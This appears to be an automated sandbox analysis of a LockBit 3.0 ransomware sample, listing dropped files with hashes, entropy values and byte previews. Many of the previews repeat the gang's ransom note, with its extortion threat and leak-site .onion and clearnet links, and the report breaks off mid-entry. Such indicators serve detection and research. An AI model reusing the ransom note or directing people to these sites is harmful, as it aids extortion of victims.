                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\PeerDistRepub\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Fonts\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Licenses\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Publishers\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Temp\0013461513.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):734
                Entropy (8bit):7.692346232820994
                Encrypted:false
                SSDEEP:12:ZagIQoEv/wVrSu/km7ggQHx0ELKoGj1U4vwCMX5z85D2VJNAWnM+i+9BVzd:YgIDyAGusvVaELKjj114xz85D2HNAX+B
                MD5:0D7831D933BC6AA1C0C41E5D09D11DAA
                SHA1:F2823BA5D1DA53A67E424B8E7FB597E90F81E6A4
                SHA-256:5C89D6293DFA432B344EF9E5FCFD77645B25C65A737E7F0F2DC0C07388E284D2
                SHA-512:1FC37E4D4FC213902920748D98AE2B62889985AC90C5651C515CBF4DA12481C2237EAE7338CFB6F6A09EE4CD0E71DCBF97171A24EB82DF588B87C196F2BB6AD8
                Malicious:false
                Preview:=.X.G.c.M.G9x.}.h...C_u.....i./.......8...j]...X.1Wr..JL...........Y.N.u.%.....+cT...g.....K...M,..]...nKN.w.8.......c(.h..,...+..~.......j....o_....m...'.J.2b^....JK..a"..0.8..L.".:b.]N.2Gc.F....p. ...y..."{.8e.2.......[C..MK.....m.H.#N.n6...B-.VB....../..@.QH..DoV...65G....p..@.....\.,.../....~..L.e...!...z........0.Q....`.LP"...6F.6##....B0......!..E.\....0..b.c.......r....s.........@!...I...`z.....T".L...|..5R...:.Pne......JTI...N-.....&X.T5....j7G.G.f(1... &...P.....t._.V!.2-.......B..r....z..i..G.R.<.~JhI.I.61.-.{.....G.Fq.2%.q....mv./|L.?..A6....45...(.........d..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Temp\0164771190.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):735
                Entropy (8bit):7.718827352769469
                Encrypted:false
                SSDEEP:12:KYj8O+kaUkZo5aqWxYNX8WHec7Oqbq+A7YH6tlIxD2VJNAWnM+i+9BVzd:GkaUkmEqWY3Hjbq+tazIxD2HNAX+i+99
                MD5:B3DFBF0BA5322D2E1D960D6026F677C9
                SHA1:61B97F81A026F81DE5701BB5567741C8DBE06850
                SHA-256:D94ED38907AA9D33020544AAA9B7045CDEB9EA0FCD7FF7AA952BE75DD48CD9CC
                SHA-512:1B832ED28D38C58109F26752C47053ED13C105D7E9202B19AFF696A7AAB9BC9686D4E3D89178C51A3425EAF9A0F1726301570A02703CFB7A42C3689D7411FC9F
                Malicious:false
                Preview:.:R..7..c..[q..........f.~._.'y0P.o......'.E._...L.S.L.....s.hr.,%.&c.g.CCU$Q<.rEe..c/.....:...'..iF...F.....5.c...V.uo..Eep+.b..T.B....:xNw...K$P._.......=..K.?Q...VB..v..&..x.J.2YzG.....P..g...{..>..8......Rm)*...U..A.T....... ..N..".........C..P......)...Ig.s.e.`.....|..Jd...i.V..2..O]..4"....Z.9B...<....sb..UW....(.N..V$A...$....I..|..[Xl.........h.}...^.....Q.\.8.s.....PVG+F.._8B.qL..IoJ....r.].....F.w...+..........p5rc..k.l...O.=..a...$.X..:....7...x......mqTmg..^n.&-5...(u..yd..a....z..i..G.Q.<..'.#I.p...=o..w.......|.N..B.3....o.....q...e..Z.?...q^l....b0 e..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Temp\0196354653.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):736
                Entropy (8bit):7.73085144406087
                Encrypted:false
                SSDEEP:12:K5x2RXGdwSuCMEAHzQAOsjOiLXUgFmKQMHabltE+epqaIckYpWGlv/Rr+VGD2VJ7:nR2UCrAHzVOsj7L/uLb7xepqDDOlBxD0
                MD5:4C22A09B2BB587F30D8ABCC071DC2D76
                SHA1:C3D8FC6CF8C5D56BC55C336E30ABD0CD7F49093E
                SHA-256:80CE6E54AA5F629621FAB1FD70EAC5638D66C69F7C9ACEEE5C98957DDEA6F9A3
                SHA-512:9265F7C4EB1D296AD062A5751A1545F5FAFAA62A9DFA9279A241F194FE4C241BEB1E8C6D7D8E8B503F4C15F63E13F98E433B2CAA2D36B02EEC58A4F743A438A2
                Malicious:false
                Preview:G...q.i..6..."........V(F..E.H ../.h...i.m...6_yE...y.{..}.....^bMZlM^...o.z...e..+.`)...x..qJd. ..V.a.\u)....Ry\...X'H[.UE$.....o*.9u.4..F .PQ..D...P6.....M......$.DH..ae.U.m.e...,gO.7..4...<!.4S`....1.k.=......G<..y..]..L..ppE.h.....v..J...j.....G.t[./'0=f.......'.....Z..[k+..k.....^._....y-6nT.......K..1K.....T#d.nQ.......k./K...F.G......%..aC.A@...e..b..>D!=.....v..-a.C..<.....S...u..Q[....z&...t.....`5.y$.O!xj.w.Lk..e-;ukh.....}..Y..X.nh..[..9..).4..v..>Z..Z.Q...^n.)-7..6.7......[r...(..i..D.Q.?..3...C....._2'q9q......b...P.0.j>W.kI..R......?9...{T........f..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Temp\0409654664.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):735
                Entropy (8bit):7.700720305938443
                Encrypted:false
                SSDEEP:12:K1YM2GttvNakry3beYpG6hcTXNfo/s8ow93TOZwLkEOsOObCw0SD2VJNAWnM+i+j:W52AtvNubeYpG6hcxQ/sq3TOOLkzXOFo
                MD5:C38367590A6295AF3B68D6FE1E16330E
                SHA1:931A9B50FFA2E097705024A957002DE9FB74597A
                SHA-256:EA81571486CB7C0323FDA47CAD3C2713FB45F3B1B5C62EF44E2587D4DEC9CE77
                SHA-512:015A7A6D94D8A6D35210340CD9B70A67763341B0AE5478EB7786D85FDD44F63006D4776D508263D8B29728BD1F96EAC47A27F50A746D876250956E7FDFCE52E4
                Malicious:false
                Preview:M.p....E...KX.(*...1.w6.O..:.,..'{!...2.....68:UU-.%S..f...@..C^..)g.vMp......`8({.Q...IoOX.~.QU......~...A.q.kreC.E...u.......$.......o..d.,..8...vL...X].y....P...E...7.qB.&.:..TWb7>,.....Z.Lj......)..q.>V....x..g+....c.L...4'..+U[K...2!.L9..Z..s..*..!..F..h.~>......0.+.N..l._4..K..Q.j.2|XK.`7....$.=..3P.....8..I&...S49....C..6.L(*.+.@..'.d...z...(.r.Vx.i.....LL.y.L......*...(c.P....>b.'..Z..n../...Q./4..sT..%.._Zy..F}..7r.`.Z`Y..AP/.)..XIew...$]A......d....XR..^k...8-....x.yL..a....z..i..G.Q.<....q.j..X.6...qd.-.......z.a.b...U7....L.Kg75..7wP....i.[V..F..ye..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Temp\0450125302.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):735
                Entropy (8bit):7.720947800470723
                Encrypted:false
                SSDEEP:12:onflWIn0XIofNRxsC61oAWuqfpnTPlG9MBsPUaaDsmXSCfUD2VJNAWnM+i+9BVzd:OfYa0FlRxsCUbBQ1TNGn8FsmXaD2HNAq
                MD5:A4D17CA2DE636FC8D8348D78A01F4E70
                SHA1:186FB4D88B06BF7A764F39C8CC7BC03C773DB926
                SHA-256:183B902D740035B6DA5BED5EFFAC1D5735FA0F113E7F39B7F3B7E922C15BE98A
                SHA-512:14A4E83F09D4D627E30D41FC9F717E22272CABB8377679B7B943658647420D789EE138845652DE242A1B429C3AAE5E7264FD6A67238A5BC377785DFBB6303644
                Malicious:false
                Preview:.4s......S....F...qF4U...9%.r[s...Dnv=.2.0.G.8...=......K`R..`.....h.C2..2q.......<w(...K....K.f....s.a..n...-.......m.G..3.mm.J..l..@.8...-....w.Jn..\....rO.<...0O.J4 .#.l...R9.g0 .Fg..>9.}W.._..d.......+..H[u....3ClJ.a...(=/.s.V.... ....T..ZZ..o...w...LQ.d..e|.G../%.L.p.....S..64...-<ei........V..5....c....8....jiH..;.L...t44n....L....F..qYL.....l...%.........5........G...F.m.tq= ry..Y$Bvu...S..x.,=.ZAA&....o.)!.E....f.!..ZX.>...i>t.k....-....W.....O..H....".Z.....^k.%,.=.....w.P.(.a....z..i..G.Q.<....^Y...P..{J8V"...z....n*.MF.V0Ns.$.W....m.M....L..o.......e;..e..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Temp\0518291756.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):736
                Entropy (8bit):7.7533062621715985
                Encrypted:false
